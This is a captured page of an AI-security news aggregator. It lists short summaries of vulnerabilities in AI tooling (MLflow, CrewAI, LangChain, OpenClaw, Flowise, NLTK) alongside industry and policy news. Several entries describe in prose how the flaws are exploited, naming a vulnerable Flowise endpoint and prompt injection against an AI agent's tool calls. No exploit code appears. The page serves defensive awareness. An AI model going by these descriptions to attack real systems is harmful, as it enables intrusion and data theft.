aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

[TOTAL_TRACKED]
2,669
[LAST_24H]
17
[LAST_7D]
160
Daily BriefingMonday, March 30, 2026
>

Anthropic's Leaked "Mythos" Model Raises Cybersecurity Concerns: An accidental configuration leak revealed Anthropic's unreleased Mythos model, which has advanced reasoning and coding abilities including recursive self-fixing (autonomously finding and patching its own bugs). The model's improved capability to find and exploit software vulnerabilities could enable more sophisticated cyberattacks, prompting Anthropic to plan a cautious rollout targeting enterprise security teams first.

>

Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where an attacker inserts malicious commands into input that gets executed) in its model serving code when deploying models with `env_manager=LOCAL`. The flaw reads dependency information from `python_env.yaml` and executes it in a shell without validation, allowing arbitrary command execution on deployment systems. (CVE-2025-15379, critical severity)

Latest Intel

page 56/267
VIEW ALL
01

CVE-2026-2589: The Greenshift – animation and page builder blocks plugin for WordPress is vulnerable to Sensitive Information Exposure

security
Mar 5, 2026

The Greenshift plugin for WordPress (used to create animations and page builder blocks) has a vulnerability where automated backup files are stored in a publicly accessible location, allowing attackers to read sensitive API keys (for OpenAI, Claude, Google Maps, Gemini, DeepSeek, and Cloudflare Turnstile) without needing to log in. This affects all versions up to 12.8.3.

Critical This Week5 issues
critical

CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_

CVE-2025-15379NVD/CVE DatabaseMar 30, 2026
Mar 30, 2026
>

Multiple High-Severity Vulnerabilities Found in CrewAI: CrewAI has several serious security flaws including two that enable RCE (remote code execution, where attackers run commands on systems they don't control) when Docker containerization fails and the system falls back to less secure sandbox settings. Additional vulnerabilities allow arbitrary file reading and SSRF (server-side request forgery, tricking a server into making unwanted requests) through improper validation in RAG search tools. (CVE-2026-2287, CVE-2026-2275, CVE-2026-2285, CVE-2026-2286)

>

LangChain Path Traversal Adds to AI Pipeline Security Woes: LangChain and LangGraph have critical flaws allowing attackers to steal sensitive data like API keys through improper input handling, including a new path traversal bug (CVE-2026-34070, CVSS 7.5) that lets attackers read arbitrary files. Maintainers have released fixes that need immediate application.

NVD/CVE Database
02

Introducing GPT‑5.4

industry
Mar 5, 2026

OpenAI released GPT-5.4 and GPT-5.4-pro, two new AI models with a 1 million token context window (the amount of text the model can consider at once) and an August 31st, 2025 knowledge cutoff. The models are priced slightly higher than the previous GPT-5.2 family and show significant improvements on business tasks like spreadsheet modeling, achieving 87.3% accuracy compared to 68.4% for GPT-5.2.

Simon Willison's Weblog
03

The Pentagon formally labels Anthropic a supply-chain risk

policy
Mar 5, 2026

The US Defense Department has officially labeled Anthropic (maker of Claude, an AI assistant) a 'supply-chain risk,' which will prevent defense contractors from using Claude in products made for the government. This escalates a dispute between the Pentagon and Anthropic over their policies on acceptable uses of the AI, and may lead to legal action.

The Verge (AI)
04

CVE-2026-28451: OpenClaw versions prior to 2026.2.14 contain server-side request forgery vulnerabilities in the Feishu extension that al

security
Mar 5, 2026

OpenClaw versions before 2026.2.14 have a server-side request forgery vulnerability (SSRF, where an attacker tricks a server into making requests to unintended targets) in the Feishu extension that allows attackers to fetch remote URLs and access internal services through the sendMediaFeishu function and markdown image processing. Attackers can exploit this by manipulating tool calls or using prompt injection (tricking the AI by hiding instructions in its input) to trigger these requests and re-upload the responses as Feishu media.

Fix: Upgrade OpenClaw to version 2026.2.14 or later.

NVD/CVE Database
05

Anthropic labelled a supply chain risk by Pentagon

policyindustry
Mar 5, 2026

The US Pentagon has officially labeled Anthropic, an AI company, as a supply chain risk, marking the first time the government has given this designation to a US firm. This decision stems from Anthropic's refusal to give the military unrestricted access to its AI tools, citing concerns about mass surveillance and autonomous weapons development. The designation prohibits any company working with the military from conducting business with Anthropic.

BBC Technology
06

GHSA-jc5m-wrp2-qq38: Flowise Vulnerable to PII Disclosure on Unauthenticated Forgot Password Endpoint

security
Mar 5, 2026

Flowise's forgot-password endpoint leaks personally identifiable information (PII: sensitive data like names and account IDs that identify individuals) to anyone who knows a valid email address, because it returns the full user object instead of a generic success message. An attacker can exploit this by sending a simple request to `/api/v1/account/forgot-password` with any email address and receive back user IDs, names, creation dates, and other account details without needing to log in.

GitHub Advisory Database
07

AWS launches a new AI agent platform specifically for healthcare

industry
Mar 5, 2026

AWS launched Amazon Connect Health, an AI agent-powered platform (software that completes complex tasks automatically) designed to help healthcare organizations automate administrative work like appointment scheduling and patient records. The platform is HIPAA-eligible (meets healthcare privacy and security standards) and integrates with existing electronic health record systems, marking AWS's first major AI agent product in a regulatory-compliant healthcare offering.

TechCrunch
08

GHSA-x2g5-fvc2-gqvp: Flowise has Insufficient Password Salt Rounds

security
Mar 5, 2026

Flowise uses an insufficiently weak password hashing setting where bcrypt (a password encryption algorithm) is configured with only 5 salt rounds, which provides just 32 iterations compared to OWASP's recommended minimum of 10 rounds (1024 iterations). This weakness means that if a database is stolen, attackers can crack user passwords roughly 30 times faster using modern GPUs, putting all user accounts at risk.

Fix: The source recommends increasing the default PASSWORD_SALT_HASH_ROUNDS environment variable to at least 10 (as recommended by OWASP), or considering 12 for a better balance between security and login performance. The source also recommends documenting that higher values will increase login time but improve security. Note: the source acknowledges that existing password hashes created with 5 rounds will remain vulnerable even after this change is applied.

GitHub Advisory Database
09

CVE-2026-0848: NLTK versions <=3.9.2 are vulnerable to arbitrary code execution due to improper input validation in the StanfordSegment

security
Mar 5, 2026

NLTK (Natural Language Toolkit, a Python library for text processing) versions 3.9.2 and earlier have a serious vulnerability in the StanfordSegmenter module, which loads external Java files without checking if they are legitimate. An attacker can trick the system into running malicious code by providing a fake Java file, which executes when the module loads, potentially giving them full control over the system.

NVD/CVE Database
10

It’s official: The Pentagon has labeled Anthropic a supply-chain risk

policyindustry
Mar 5, 2026

The U.S. Department of Defense has officially designated Anthropic, an AI company, as a supply-chain risk (a classification usually reserved for foreign adversaries), requiring any organization working with the Pentagon to certify it doesn't use Anthropic's products. This designation came after Anthropic CEO Dario Amodei refused to allow the military to use the company's AI systems for mass surveillance of Americans or to power fully autonomous weapons with no human involvement in targeting decisions. The move is threatening Anthropic's operations, especially since the military currently relies on Anthropic's Claude AI for operations in the Middle East and other classified work.

TechCrunch
Prev1...5455565758...267Next
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873NVD/CVE DatabaseMar 27, 2026
Mar 27, 2026
critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO OnlineMar 27, 2026
Mar 27, 2026
critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521CISA Known Exploited VulnerabilitiesMar 26, 2026
Mar 26, 2026
critical

CISA: New Langflow flaw actively exploited to hijack AI workflows

BleepingComputerMar 26, 2026
Mar 26, 2026